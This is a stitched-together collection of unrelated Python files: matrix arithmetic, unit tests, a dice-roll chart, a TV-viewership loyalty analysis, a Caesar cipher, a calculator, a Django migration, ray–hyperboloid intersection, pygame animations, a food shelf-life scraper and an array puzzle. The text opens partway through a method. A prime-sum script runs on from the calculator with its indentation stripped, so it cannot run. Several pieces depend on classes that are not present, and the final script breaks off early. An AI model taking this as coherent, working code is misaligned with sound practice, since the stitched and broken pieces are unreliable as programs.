                    raw = list()
                    for column in range(other.rows):
                        # Dot product of this row with the (transposed)
                        # column; sum() replaces the hand-rolled reduce().
                        raw.append(sum(map(lambda x, y: x * y,
                                           self.matrix[row],
                                           other.matrix[column])))
                    result.append(raw)
                return Matrix(result)
            else:
                raise ValueError('Unsuitable dimensions of operands.')
        elif isinstance(other, int):
            res = list()
            for row in range(self.rows):
                res.append([item * other for item in self.matrix[row]])
            return Matrix(res)
        else:
            raise ValueError('Wrong operand type. Must be int or Matrix.')

    def __eq__(self, other):
        """Element-wise equality of two same-shaped matrices.

        :raises ValueError: if shapes differ.
        """
        if other.rows == self.rows and other.columns == self.columns:
            # all() short-circuits on the first mismatch (the original
            # kept and-ing every remaining element).
            return all(self.matrix[row][col] == other.matrix[row][col]
                       for row in range(self.rows)
                       for col in range(self.columns))
        raise ValueError('Unsuitable dimensions of operands.')

    def is_square(self):
        """
        Check if matrix is square.
        >>> a = Matrix([[1, 2], [3, 4]])
        >>> a.is_square()
        True
        >>> b = Matrix([[1, 2, 3], [4, 5, 6]])
        >>> b.is_square()
        False
        :return: bool True or False.
        """
        return self.rows == self.columns

    def transpose(self):
        """
        Transpose matrix.
        >>> a = Matrix([[1, 2], [3, 4]])
        >>> a
        [1, 2]
        [3, 4]
        >>> b = a.transpose()
        >>> b
        [1, 3]
        [2, 4]
        :return: Matrix object
        """
        res = list()
        for col in range(self.columns):
            res.append([self.matrix[row][col] for row in range(self.rows)])
        return Matrix(res)

    def is_symmetric(self, diag='main'):
        """
        Check if matrix is symmetrical with respect to the main or anti diagonal.
        By default checking by main diagonal.
        >>> a = Matrix([[1, 1, 3], [1, 1, 2], [3, 2, 1]])
        >>> a.is_symmetric()
        True
        >>> b = Matrix([[5, 4, 1], [6, 2, 4], [3, 6, 5]])
        >>> b.is_symmetric(diag='anti')
        True
        :param diag: could be 'main' or 'anti'. Specify diagonal for symmetric check.
        :type diag: str.
        :return: bool True or False (the original docstring wrongly said None).
        :raises ValueError: for a non-square matrix or an unknown diag.
        """
        if self.is_square():
            if diag == 'main':
                return self == self.transpose()
            elif diag == 'anti':
                # Reverse every row and the row order, then compare with
                # the transpose: anti-diagonal symmetry reduces to main-
                # diagonal symmetry of the rotated matrix.
                to_compare = []
                for row in range(self.rows):
                    to_compare.append(self.matrix[row][::-1])
                to_compare = Matrix(to_compare[::-1])
                return self == to_compare.transpose()
            else:
                # Error message previously had a truncated closing quote.
                raise ValueError("Wrong diag. Could be 'main' or 'anti'.")
        else:
            raise ValueError("Non square matrix.")
# Tests
b = Matrix([[1, 2], [3, 4]])
c = Matrix([[1, 2, 3, 4, 5, 6, 7]])  # a 1x7 row matrix
v = Matrix(2, 2)  # 2x2 matrix of random ints in [0, 100]
try:
    t = Matrix([[1, 2, 3], [4, 5, 6, 43]])  # ragged rows -> ValueError
except ValueError:
    print('Error during matrix creation!')
k = b * 3
print(k)
k = b + v
print(k)
k = b - v  # NOTE(review): result is computed but never printed or used
print(b.transpose())
print(v.transpose())
|
import pytest
from .data import temperatures
from .task import get_temperature_closest_to_zero
def test_get_temperature_closest_to_zero():
    """Spot-check get_temperature_closest_to_zero: the shared fixture,
    the empty list, exact zeros, and ties where the positive value wins."""
    assert get_temperature_closest_to_zero(temperatures) == 0.5
    table = [
        ([], 0),
        ([-1, 2, 4, 0.2, 5, 3, -2, -0.1], -0.1),
        ([1, 2, 3, 4, 5, 0, 11], 0),
        ([11, -11], 11),
        ([120, -3, 55], -3),
        ([1, -1, 0.1], 0.1),
        ([3, -3], 3),
    ]
    for sample, expected in table:
        assert get_temperature_closest_to_zero(sample) == expected
|
#Done by Carlos Amaral (21/07/2020)
from plotly.graph_objs import Bar, Layout
from plotly import offline
from die import Die
# Create a D6.
die = Die()

# Roll the die 1000 times and collect the outcomes.
results = [die.roll() for roll_num in range(1000)]

# Analyse the results: count how often each face came up.
frequencies = [results.count(value) for value in range(1, die.num_sides + 1)]

# Visualize the results.
x_values = list(range(1, die.num_sides + 1))  # one bar per possible face (1..6)
data = [Bar(x=x_values, y=frequencies)]  # Bar() data set rendered as a bar chart
x_axis_config = {'title': 'Result'}  # x-axis title
y_axis_config = {'title': 'Frequency of Result'}  # y-axis title
# Layout() configures the graph as a whole.
my_layout = Layout(title='Results of rolling one D6 1000 times',
                   xaxis=x_axis_config, yaxis=y_axis_config)
offline.plot({'data': data, 'layout': my_layout}, filename='d6.html')
|
import MySQLdb
import pandas as pd
import numpy as np
from datetime import datetime,date
import fwm_config as fwm_config
#from create_deviceid_program_matrix_primetime import get_all_program_listing
#from create_deviceid_program_matrix_primetime import read_all_device_info
#from create_deviceid_program_matrix_primetime import add_viewtime_info
#from create_deviceid_program_matrix_primetime import filter_7PM_10PM
def get_prog_viewtime_matrix(db, current_month, dma_code, mso):
    """Fetch prime-time (20:00-23:00) viewing rows for one month of 2014.

    Devices are selected by DMA code or, failing that, by MSO (whichever
    argument is not -1).  Python 2 code: print statements, and len() on
    the result of map().

    NOTE(review): if BOTH dma_code and mso are -1, `result` is never
    assigned and the dev_list line raises NameError — confirm callers
    always pass one real filter.

    :param db: database wrapper exposing query_new(sql, param)
    :param current_month: two-digit month string, e.g. '04'
    :param dma_code: DMA filter, or -1 to filter by mso instead
    :param mso: MSO filter, or -1
    :return: list of row dicts from the monthly fwm_tv table
    """
    db_tv_table = 'fwm_tv_%s_2014' %current_month
    db_ref_table = 'fwm_ref_%s_2014' %current_month
    if dma_code!=-1:
        query_dev = """
        SELECT DISTINCT device_id FROM {0}
        WHERE dma_code = %s;
        """.format(db_ref_table)
        result = db.query_new(query_dev, dma_code)
    elif mso!=-1:
        query_dev = """
        SELECT DISTINCT device_id FROM {0}
        WHERE mso = %s;
        """.format(db_ref_table)
        result = db.query_new(query_dev, mso)
    dev_list = map(lambda x : x['device_id'], result)
    print 'number of devices got from ref_table:',len(dev_list)
    # Pull each device's prime-time viewing events for the month.
    query_data = """
    SELECT device_id, event_date, event_time, program_tms_id, program_title, program_viewtime FROM {0}
    WHERE device_id IN %s AND event_id IS NOT NULL
    AND event_time BETWEEN '20:00:00' AND '23:00:00';
    """.format(db_tv_table)
    result = db.query_new(query_data, dev_list) # a tuple
    #add_viewtime_info(result,tms_id_prog_name_dict)
    #filtered_result = filter_7PM_10PM(result)
    print 'Result Count', len(result)
    #print 'Filtered Result Count', len(filtered_result)
    return list(result)
def viewtime_threshold(viewtime):
    """Zero out viewing sessions shorter than 5 minutes (300 s).

    Replaces the fragile ``cond and x or y`` idiom with a conditional
    expression (same result here, since any viewtime >= 300 is truthy).

    :param viewtime: viewing duration in seconds
    :return: viewtime if it is at least 300, otherwise 0
    """
    return viewtime if viewtime >= 300 else 0
#def week_number(date):
#if(date < datetime.date(2014,4,8)):
# return 1
def count_dev_per_prog_weekly(df):
    """Map each program title to the devices that watched it for more
    than 10 minutes (600 s) within a given week.

    :param df: DataFrame with columns device_id, program_title, week,
        program_viewtime
    :return: dict {program_title: [device_id, ...]}
    """
    effective = dict()
    grouped = df.groupby(['device_id', 'program_title', 'week'])
    for (device, program, _week), group in grouped:
        total_viewtime = group['program_viewtime'].sum()
        if total_viewtime > 600:  # 10 min threshold
            effective.setdefault(program, []).append(device)
    return effective
def analyse_loyalty(prog_weekly_dev_dict_list, dma_code, mso):
    """Build a week-over-week viewer-retention ("loyalty") report per
    program and write it to a CSV named after the dma/mso filters.

    For each consecutive week pair (t(i-1), t(i)) the report holds the
    viewer count, the overlap of devices between the weeks, and the
    overlap as a fraction of the earlier week's audience.

    Python 2 code (print statements, list-indexable map results).

    :param prog_weekly_dev_dict_list: one {program: [device, ...]} dict
        per week, in chronological order
    :param dma_code: DMA filter used (for the output file name)
    :param mso: MSO filter used (for the output file name)
    """
    print 'Begin analyzing loyalty ...'
    prog_dict = dict()
    # Seed column t0 with the first week's audience sizes.
    first_dict = prog_weekly_dev_dict_list[0]
    for prog in first_dict:
        prog_dict.setdefault(prog,{})['t0'] = len(first_dict[prog])
    col_name = ['t0']
    sort_col_name = ['t0'] # sort the output data based on these columns
    for i in range(1,len(prog_weekly_dev_dict_list)):
        # Three columns per later week: size, overlap, and loyalty ratio.
        col_name.append('t%s' %str(i))
        col_name.append('t%s-%s' %(str(i-1),str(i)))
        col_name.append('t%s-%s loyalty ratio' %(str(i-1),str(i)))
        #sort_col_name.append('t%s-%s' %(str(i-1),str(i)))
        sort_col_name.append('t%s' %str(i))
        pre_dict = prog_weekly_dev_dict_list[i-1]
        curr_dict = prog_weekly_dev_dict_list[i]
        for prog, dev_list in curr_dict.items():
            prog_dict.setdefault(prog,{})['t%s'%str(i)] = len(dev_list)
            try:
                # Devices seen in both weeks for this program.
                common_np = np.intersect1d(pre_dict[prog],dev_list)
                prog_dict[prog]['t%s-%s' %(str(i-1),str(i))] = common_np.size
                if common_np.size == 0:
                    prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = 0
                else:
                    prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = common_np.size*1.0/len(pre_dict[prog])
            except KeyError:
                # Program was not aired/watched the previous week.
                prog_dict[prog]['t%s-%s' %(str(i-1),str(i))] = 0
                prog_dict[prog]['t%s-%s loyalty ratio' %(str(i-1),str(i))] = 0
    # Flatten {program: columns} into a list of row dicts for pandas.
    prog_list = list()
    for key,value in prog_dict.items():
        value['program_title'] = key
        prog_list.append(value)
    df = pd.DataFrame(prog_list)
    df = df.fillna(0)
    #df = df.sort(sort_col_name, ascending=[0,0,0])
    df['viewer_mean'] = df[sort_col_name].mean(axis=1)
    # NOTE(review): DataFrame.sort was removed in modern pandas; this
    # call requires an old pandas (sort_values is the successor).
    df = df.sort('viewer_mean',ascending=0)
    col_name.sort(key=lambda x:len(x))
    df.to_csv('output_dma=%s_mso=%s.csv'%(dma_code,mso), columns=['program_title']+col_name)
def count_dev_per_prog(dma_code, mso):
    """Build the program/device loyalty report for one DMA or MSO.

    Pulls April-June 2014 prime-time viewing rows, cleans them, buckets
    them by ISO week (weeks 14-26) and hands the weekly program->devices
    maps to analyse_loyalty.

    :param dma_code: DMA filter, or -1 to filter by mso instead
    :param mso: MSO filter, or -1 to filter by dma_code instead
    """
    db = fwm_config.Database()
    # Concatenate the three monthly result sets.
    filtered_re = get_prog_viewtime_matrix(db, '04', dma_code, mso)
    filtered_re.extend(get_prog_viewtime_matrix(db, '05', dma_code, mso))
    filtered_re.extend(get_prog_viewtime_matrix(db, '06', dma_code, mso))
    df = pd.DataFrame(filtered_re)
    # BUG FIX: `df.program_tms_id is not None` compared the Series OBJECT
    # with None (always True, filtering nothing); notnull() tests each
    # element as the original comment intended.
    df = df[(df.program_tms_id != 'MP_MISSINGPROGRAM') & (df.program_tms_id.notnull())]
    # Merge the finals into the regular program title.
    df.loc[df.program_title=='2014 NBA Finals','program_title'] = 'NBA Basketball'
    df['program_viewtime'] = df['program_viewtime'].map(viewtime_threshold)
    df['week'] = df['event_date'].map(lambda x : x.isocalendar()[1])
    df = df[(df.week >= 14) & (df.week <= 26)]
    # One dict per ISO week, in week order. A list comprehension replaces
    # map() so the result stays indexable under Python 3 as well.
    prog_weekly_dev_dict_list = [count_dev_per_prog_weekly(group)
                                 for _, group in df.groupby('week')]
    analyse_loyalty(prog_weekly_dev_dict_list, dma_code, mso)
if __name__=='__main__':
    # dma = 524 (Atlanta); 501 (New York)
    #tasks = [(-1,6760),(524,-1),(501,-1),(-1,6330)] # (dma_code, mso)
    tasks = [(524,-1),(501,-1)] # (dma_code, mso)
    # Run the loyalty analysis for each (dma_code, mso) pair; -1 marks
    # the filter that is not used.  Python 2 print statements.
    for task in tasks:
        print 'Start to analyze task ', task, ' at: ', datetime.now()
        count_dev_per_prog(task[0], task[1])
    print 'All Done at: ', datetime.now()
|
def caesar_encryption(str, step):
    """Caesar-shift each ASCII letter of *str* by *step* positions.

    Case is preserved; the shift wraps around the alphabet (step may be
    negative or larger than 26).  Characters that are not ASCII letters
    are passed through unchanged (the original silently dropped them).
    The unused `crypttext` index list was removed.

    :param str: text to encrypt (name kept for call compatibility even
        though it shadows the builtin)
    :param step: shift amount
    :return: list of single-character strings
    """
    from string import ascii_lowercase as lowercase, ascii_uppercase as uppercase
    outtext = []
    for ch in str:
        if ch in uppercase:
            outtext.append(uppercase[(uppercase.index(ch) + step) % 26])
        elif ch in lowercase:
            outtext.append(lowercase[(lowercase.index(ch) + step) % 26])
        else:
            # Pass non-letters (spaces, digits, punctuation) through.
            outtext.append(ch)
    return outtext
# Demo: encrypt a sample word with shift 2 and show the letter list.
code=caesar_encryption('pyThon',2)
print(code)
import unittest
from modules.User import *
from modules.Role import *
from main import *
from unittest.mock import patch, Mock
class TestSum(unittest.TestCase):
    """Unit tests for the user/role loading helpers in main."""
    @patch('main.getRoles')
    def test_set_user_successful(self, MockRoles):
        """
        Test that it set valid set of users
        """
        # Arrange
        # NOTE(review): patching 'main.getRoles' replaces it with MockRoles;
        # calling MockRoles() here and setting return_value on that RESULT
        # does not make main.getRoles() return `roles` — this was probably
        # meant to be MockRoles.return_value = roles. Confirm.
        getRoles = MockRoles()
        roles = []
        roles.append(Role(1, 'Admin', 0))
        roles.append(Role(2, 'Manager', 1))
        roles.append(Role(3, 'Supervisor', 2))
        getRoles.return_value = roles
        data = '[{"Id":1,"Name":"Adam Admin","Role":1},{"Id":2,"Name":"Emily Employee","Role":2},{"Id":3,"Name":"Sam Supervisor","Role":3}]'
        # Act
        result = setUsers(data, loadDefault=False)
        # Assert
        self.assertEqual(len(result), 3)
    @patch('main.getRoles')
    def test_set_user_failed(self, MockRoles):
        """
        Test that it set valid set of users
        """
        # Arrange
        # NOTE(review): same mock wiring concern as above; also, this test
        # only checks the count is not 6 — it duplicates the arrange/act of
        # the success test rather than exercising a failure path.
        getRoles = MockRoles()
        roles = []
        roles.append(Role(1, 'Admin', 0))
        roles.append(Role(2, 'Manager', 1))
        roles.append(Role(3, 'Supervisor', 2))
        getRoles.return_value = roles
        data = '[{"Id":1,"Name":"Adam Admin","Role":1},{"Id":2,"Name":"Emily Employee","Role":2},{"Id":3,"Name":"Sam Supervisor","Role":3}]'
        # Act
        result = setUsers(data, loadDefault=False)
        # Assert
        self.assertIsNot(len(result), 6)
    def test_set_role_successful(self):
        """
        Test that it set valid set of roles
        """
        # Arrange
        data = '[{"Id":1,"Name":"System Administrator","Parent":0},{"Id":2,"Name":"Location Manager","Parent":1},{"Id":3,"Name":"Supervisor","Parent":2},{"Id":4,"Name":"Employee","Parent":3},{"Id":5,"Name":"Trainer","Parent":3}]'
        # Act
        result = setRoles(data, loadDefault=False)
        # Assert
        self.assertEqual(len(result), 5)
    def test_get_sub_ordinates_successful(self):
        """
        Test that it set valid set of users
        """
        # Arrange
        # Load the built-in default role/user fixtures.
        setRoles([], loadDefault=True)
        setUsers([], loadDefault=True)
        # Act
        result = getSubOrdinates(4, printResult=False)
        # Assert
        self.assertEqual(len(result), 3)
# Run the suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
# Simple four-operation calculator: "1" add, "2" subtract, "3" multiply,
# "4" divide.  The operands are converted to int once at input time; the
# redundant int() casts inside every branch were removed.
islem = input("İslemi Giriniz:")
sayi1 = int(input("Sayi1: "))
sayi2 = int(input("Sayi2: "))
if islem =="1":
    sonuc = sayi1 + sayi2
    print("Sonuc: ", str(sonuc))
elif islem== "2":
    sonuc = sayi1 - sayi2
    print("Sonuc: ", str(sonuc))
elif islem== "3":
    sonuc = sayi1 * sayi2
    print("Sonuc: ", str(sonuc))
elif islem== "4":
    # NOTE(review): sayi2 == 0 raises ZeroDivisionError, and "/" yields a
    # float — confirm whether a guard / integer division was intended.
    sonuc = sayi1 / sayi2
    print("Sonuc: ", str(sonuc))
"""The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
Find the sum of all the primes below two million."""
primeArray = [1]*2000000
for x in range(1,2000000):
if primeArray[x] == 1:
iteration = 2
while iteration*(x+1) <= 2000000:
primeArray[iteration*(x+1)-1] = 0
iteration += 1
sumTotal = -1 # One is not a prime number, so we start at -1
for xVal, x in enumerate(primeArray, start = 1):
if x == 1:
sumTotal += xVal
print(sumTotal)
|
# Generated by Django 2.1.7 on 2019-03-06 00:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: makes the user's Email field unique with
    max_length 30."""
    dependencies = [
        ('AppTwo', '0003_auto_20190305_1931'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user',
            name='Email',
            field=models.EmailField(max_length=30, unique=True),
        ),
    ]
|
from plone.uuid.interfaces import IUUIDGenerator
from zope.interface import implementer
import uuid
@implementer(IUUIDGenerator)
class UUID4Generator:
    """Default UUID generator.

    Produces a random (version 4) UUID via uuid.uuid4() on every call.
    """

    def __call__(self):
        # .hex is the canonical 32-character form with the dashes stripped.
        generated = uuid.uuid4()
        return generated.hex
|
#! /usr/bin/env python
# -*-coding: utf-8-*-
from math import sqrt, tan
class Hyperboloide():
    '''
    Class defining a two-sheet hyperboloid in space, characterised by
    [*] its origin (Vector)
    [*] its coefficients a, b and c ([int/float, int/float, int/float])
    [*] its absorption of the RGB colours ([int, int, int])
    '''
    def __init__(self, o, c, rho):
        # o: origin, c: (a, b, c) coefficients, rho: RGB absorption
        self.origin = o
        self.coeff = c
        self.rho = rho
    def intersect(self,ray):
        # Test the intersection between the hyperboloid and a ray.
        # Takes a ray, returns an intersection object.
        # The ray parameter t satisfies m*t^2 + n*t + p = 0.
        # Unpack the coefficients to use.
        a = self.coeff[0]
        b = self.coeff[1]
        c = self.coeff[2]
        x_0 = self.origin[0]
        y_0 = self.origin[1]
        z_0 = self.origin[2]
        u_x = ray.dir[0]
        u_y = ray.dir[1]
        u_z = ray.dir[2]
        u_x0 = ray.origin[0]
        u_y0 = ray.origin[1]
        u_z0 = ray.origin[2]
        # Compute the quadratic's coefficients.
        m = (u_x/a)**2 - (u_y/b)**2 + (u_z/c)**2
        n = 2 * (u_x*(u_x0 - x_0)/a**2 - u_y*(u_y0 - y_0)/b**2 + u_z*(u_z0 - z_0)/c**2)
        p = ((x_0 - u_x0)/a)**2 - ((y_0 - u_y0)/b)**2 + ((z_0 - u_z0)/c)**2 + 1
        # Delegate the root solving; returns an intersection object.
        return poly2getIntersection(m,n,p)
    def getNormale(self, pt):
        # Return the normal vector to the surface at a given point
        # (gradient of the implicit equation, normalised).
        a = self.coeff[0]
        b = self.coeff[1]
        c = self.coeff[2]
        x_0 = self.origin[0]
        y_0 = self.origin[1]
        z_0 = self.origin[2]
        # NOTE(review): `.getNormalized` has no parentheses — unless it is
        # a property on Vector (defined elsewhere), this returns the bound
        # method rather than a normalised vector. Confirm.
        return Vector((pt[0]-x_0)/a**2, -(pt[1]-y_0)/b**2, (pt[2]-z_0)/c**2).getNormalized
def poly2getIntersection(a,b,c):
    """Solve the quadratic a*t^2 + b*t + c = 0 for a ray parameter.

    Returns an Intersection object: has_intersection is False when there is
    no real root or both roots lie behind the ray origin; otherwise t is the
    nearest non-negative root.
    """
    result = Intersection()
    discriminant = b*b - 4*a*c
    if discriminant < 0:
        # No real roots: the ray misses the surface.
        result.has_intersection = False
        return result
    root = sqrt(discriminant)
    t_near = (-b - root) / (2*a)
    t_far = (-b + root) / (2*a)
    if t_far < 0:
        # Both hits are behind the ray origin.
        result.has_intersection = False
        return result
    result.has_intersection = True
    # Prefer the closer hit when it is in front of the origin.
    result.t = t_far if t_near < 0 else t_near
    return result
"""Admin registrations for this app's models."""
from django.contrib import admin
from stackapi import models# Edit 7
# Register your models here.
from .models import Question
# Expose Question and the stackapi User model in the Django admin site.
admin.site.register(Question)
admin.site.register(models.User)# Edit 6
|
import os
import pygame
class Action:
    """
    A basic character animation: an ordered list of frames loaded from disk.

    Frames are read from resource/img/<path>/<prefix>NN.tga, where NN is the
    frame number zero-padded to two digits.
    """
    def __init__(self, path: str, prefix: str, image_count: int, is_loop: bool):
        """
        Load all frames of the action.
        :param path: directory (under resource/img) holding the frames
        :param prefix: file-name prefix shared by every frame
        :param image_count: number of frames
        :param is_loop: whether the animation repeats when it finishes
        """
        self.image_index = 0
        self.action_images = []  # loaded pygame surfaces, in frame order
        self.image_count = image_count
        self.is_loop = is_loop
        for frame in range(image_count):
            file_name = prefix + str(frame).zfill(2) + '.tga'
            img_path = os.path.join('resource', 'img', path, file_name)
            self.action_images.append(pygame.image.load(img_path))
    def get_current_image(self) -> pygame.image:
        """
        Return the frame for this tick and advance the frame cursor.
        :return: the current pygame surface
        """
        image = self.action_images[self.image_index]
        self.image_index += 1
        # NOTE(review): the original compares index+1 to the count, so while
        # looping the cursor wraps before ever reaching the last frame index;
        # behavior preserved as-is.
        if self.image_index + 1 >= self.image_count:
            self.image_index = 0 if self.is_loop else self.image_count - 1
        return image
    def is_end(self) -> bool:
        """
        Whether the animation has finished.
        :return: always False for looping actions; otherwise True once the
            cursor reaches the last frame
        """
        if self.is_loop:
            return False
        return self.image_index >= self.image_count - 1
    def reset(self):
        """
        Rewind the animation to its first frame.
        :return:
        """
        self.image_index = 0
# Direction codes: 0 = down, 1 = left, 2 = up, 3 = right
class DirAction:
    """
    A directional character animation: one frame sequence per facing.

    Frames are read from resource/img/<path>/<prefix>DDFFF.tga where DD is
    the zero-padded direction index and FFF the zero-padded frame index.
    """
    def __init__(self, path: str,
                 prefix: str, dir_count: int, image_count: int, is_loop: bool):
        """
        Load all frames for every facing.
        :param path: directory (under resource/img) holding the frames
        :param prefix: file-name prefix shared by every frame
        :param dir_count: number of facings
        :param image_count: frames per facing
        :param is_loop: whether the animation repeats when it finishes
        """
        self.image_index = 0
        self.action_images = []  # action_images[direction][frame]
        self.image_count = image_count
        self.dir = 0
        self.is_loop = is_loop
        for direction in range(dir_count):
            frames = []
            for frame in range(image_count):
                file_name = prefix + ("%02d" % direction) + ("%03d" % frame) + '.tga'
                img_path = os.path.join('resource', 'img', path, file_name)
                frames.append(pygame.image.load(img_path))
            self.action_images.append(frames)
    def get_current_image(self, dir: int) -> pygame.image:
        """
        Return the frame for facing *dir* at this tick and advance the cursor.
        :param dir: facing to draw
        :return: the current pygame surface
        """
        image = self.action_images[dir][self.image_index]
        self.image_index += 1
        # Same index+1 wrap rule as Action; behavior preserved as-is.
        if self.image_index + 1 >= self.image_count:
            self.image_index = 0 if self.is_loop else self.image_count - 1
        return image
    def is_end(self) -> bool:
        """
        Whether the animation has finished.
        :return: always False for looping actions; otherwise True once the
            cursor reaches the last frame
        """
        if self.is_loop:
            return False
        return self.image_index >= self.image_count - 1
    def reset(self):
        """
        Rewind the animation to its first frame.
        :return:
        """
        self.image_index = 0
|
import requests
from bs4 import BeautifulSoup
from bs4 import Tag
from database import insert_general_table
counter = 0
def normalize_name(name):
    """Strip site-specific suffixes from an item name.

    Removes ' lasts', ' last' and '(hard)*' (checked in that order), matching
    how eatbydate.com labels item rows.
    """
    for noise in (' lasts', ' last', '(hard)*'):
        if noise in name:
            name = name.replace(noise, '')
    return name
def get_unopened(raw):
    """Map a table header cell to an opened/unopened flag.

    Returns None for the placeholder headers '(Unopened/Opened)' and '-',
    False when the text mentions 'unopened', True when it mentions 'opened'
    (checked in that order), and None otherwise.
    """
    if raw in ('(Unopened/Opened)', '-'):
        return None
    lowered = raw.lower()
    if 'unopened' in lowered:
        return False
    if 'opened' in lowered:
        return True
    return None
# Convert a compact amount like '2years' into days via the units table
# (ex: 1 Year -> 365 days).
def get_bound(normalized, units):
    """Split *normalized* into its leading digits and trailing unit text,
    then return amount * units[unit]."""
    split_at = None
    for pos, ch in enumerate(normalized):
        if not ch.isdigit():
            split_at = pos
            break
    return int(normalized[0:split_at]) * units[normalized[split_at:]]
# Returns lower bound, upper bound, unit type
def get_lower_and_upper_range(raw):
    """Parse a shelf-life phrase into (lower, upper, unit).

    Examples: 'Same Day' -> (1, 1, 'Day'); '2-3 Days' -> (2, 3, 'Days');
    '7 Days' -> (7, None, 'Days'); 'Indefinite' -> (99999, 99999, 'Days').
    Returns None for phrases that cannot be parsed ('Cook first', '--', '-').
    """
    # Infinite amount of time
    if raw == 'Indefinite':
        return (99999, 99999, 'Days')
    # Edge case: contains + in name (ex: 2+ Years -> 2 Years)
    if '+' in raw:
        raw = raw.replace('+', '')
    # Edge case: unsure what 'Cook First' means
    if raw == 'Cook first':
        return None
    # Drop any parenthesised qualifier
    if '(' in raw:
        raw = raw[0: raw.index('(')]
    # Unparseable placeholder cells
    if '--' in raw:
        return None
    if '-' == raw:
        return None
    # Contains several units of measurement, e.g. '1 Year - 6 Months':
    # convert both sides to days
    if "Year" in raw and "Months" in raw:
        normalized = raw.replace(" ", "").lower()
        units = {
            "year": 365,
            "years": 365,
            "month": 30,
            "months": 30
        }
        dash = normalized.index('-')
        return (get_bound(normalized[0:dash], units), get_bound(normalized[dash + 1:], units), "Days")
    # Phrases like '2 Weeks past date' keep only the leading amount+unit
    if "date" in raw:
        raw = ' '.join(raw.split()[0:2])
    if raw == 'Same Day':
        return (1, 1, 'Day')
    elif '-' in raw:
        # BUG FIX: the original sliced exactly one character for the upper
        # bound, so '7-10 Days' parsed as (7, 1, '0Days'). Split on the dash
        # and on the first space instead, handling multi-digit bounds.
        left, _, right = raw.partition('-')
        upper_str, _, unit = right.strip().partition(' ')
        return (int(left.strip()), int(upper_str), unit.replace(" ", ""))
    else:
        index = raw.index(' ')
        return (int(raw[0:index]), None, raw[index + 1:].replace(" ", ""))
def scrape_category_of_items(URL, category, subcategory):
    """Scrape every item linked from a category listing page.

    Finds each 'arrow-list' block, follows every item link inside it, and
    delegates the table scrape to scrape_single_item_from_page.

    :param URL: category listing page URL
    :param category: top-level category passed through to each item
    :param subcategory: subcategory passed through to each item
    """
    r = requests.get(url=URL)
    # FIX: name the parser explicitly, matching scrape_single_item_from_page.
    # Omitting it triggers bs4's GuessedAtParserWarning and makes the parse
    # depend on which parsers happen to be installed.
    soup = BeautifulSoup(r.text, "html.parser")
    # Renamed loop variable: the original shadowed the builtin 'list'.
    for arrow_list in soup.find_all('div', {'class': 'arrow-list'}):
        for li in filter(lambda x: type(x) is Tag, arrow_list.ul.contents):
            name = li.a.contents[0]
            url = li.a['href']
            scrape_single_item_from_page(url, name, category, subcategory)
# Working for fruit pages
def scrape_single_item_from_page(URL, general_name, category, subcategory):
    """Scrape one item page's shelf-life table and insert rows into the DB.

    One row is produced per (item, storage column) pair, tagged with the
    current opened/unopened header state.

    :param URL: item page URL
    :param general_name: display name for the item (not used for row names;
        names are re-read from the table itself)
    :param category: top-level category stored with each row
    :param subcategory: subcategory stored with each row
    """
    global counter
    r = requests.get(url=URL)
    soup = BeautifulSoup(r.text, "html.parser")
    categories = []  # current header: [opened-state, storage, storage, ...]
    items = []       # rows accumulated for this page
    possible_storages = ['Counter', 'Refrigerator', 'Freezer', 'Pantry', 'Shelf', 'Fridge']
    for tr in filter(lambda x: type(x) is Tag, soup.select('div table')[0].tbody.children):
        current_contents = list(filter(lambda x: type(x) is Tag, tr.contents))
        if len(current_contents) == 0:
            # Bare-text row: may update the opened/unopened state header.
            # NOTE(review): assumes a header row was already seen (categories
            # non-empty); otherwise categories[0] raises IndexError.
            if len(tr.contents) != 0 and "opened" in str(tr.contents[0]).lower():
                categories[0] = str(tr.contents[0])
            continue
        # Current row is an invalid header (Past printed date)
        if len(current_contents[1].contents) != 0 and str(current_contents[1].contents[0]) == 'Past Printed Date':
            continue
        # Current row is a header (unopened, pantry, etc...) containing non-product info
        if len(current_contents[1].contents) != 0 and str(current_contents[1].contents[0]) in possible_storages:
            categories.clear()
            for th in current_contents:
                categories.extend(list(map(lambda x: str(x), th.contents)))
            if len(current_contents[0].contents) == 0:
                categories.insert(0, '-')
        # Current row is a product row (item)
        else:
            if "Date" in current_contents[1].contents[0]:
                continue
            name = normalize_name(current_contents[0].contents[0].contents[0])
            for i in range(1, len(categories)):
                unopened = get_unopened(categories[0])
                ranges = get_lower_and_upper_range(current_contents[i].contents[0])
                if ranges is None:
                    print("Unable to add item " + name + " - " + categories[i] + " (range: " + current_contents[i].contents[0] + ")")
                else:
                    item = (name, counter, category, subcategory, categories[i], unopened, ranges[0], ranges[1], ranges[2])
                    # BUG FIX: the original did items.append(items), appending
                    # the list to itself instead of recording the row.
                    items.append(item)
                    insert_general_table(item)
                    print("Inserted: " + str(item))
                    counter += 1
if __name__ == '__main__':
    # Seed pages first, then whole-category crawls.
    scrape_single_item_from_page("https://www.eatbydate.com/fruits/fresh/tomatoes-shelf-life-expiration-date//", "Apples", "Fruits", "Fresh Fruits")
    scrape_category_of_items("https://www.eatbydate.com/fruits/fresh/", "Fruits", "Fresh Fruits")
    scrape_category_of_items("https://www.eatbydate.com/proteins/beans-peas/", "Proteins", "Beans & Peas")
    scrape_single_item_from_page("https://www.eatbydate.com/proteins/meats/deli-meat-shelf-life-expiration-date/", "Deli Meat", "Proteins", "Deli Meat")
    scrape_category_of_items("https://www.eatbydate.com/proteins/meats/", "Proteins", "Meats")
    scrape_category_of_items("https://www.eatbydate.com/proteins/nuts/", "Proteins", "Nuts and Seeds")
    scrape_category_of_items("https://www.eatbydate.com/proteins/poultry/", "Proteins", "Poultry")
    # NOTE(review): the "Seafood" crawl reuses the poultry URL — looks like a
    # copy/paste slip; confirm the intended seafood category URL.
    scrape_category_of_items("https://www.eatbydate.com/proteins/poultry/", "Proteins", "Seafood")
    print("Added a total of " + str(counter) + " items to the database")
#!/bin/python3
import sys
def minimumAbsoluteDifference(n, arr):
    """Return the minimum absolute difference between any pair among the
    first n elements of arr.

    Sorts arr in place; after sorting, the closest pair is always adjacent.
    """
    arr.sort()
    return min(abs(arr[i] - arr[i - 1]) for i in range(1, n))
if __name__ == "__main__":
    # Read n, then n space-separated integers, and print the minimum
    # absolute difference between any pair.
    n = int(input().strip())
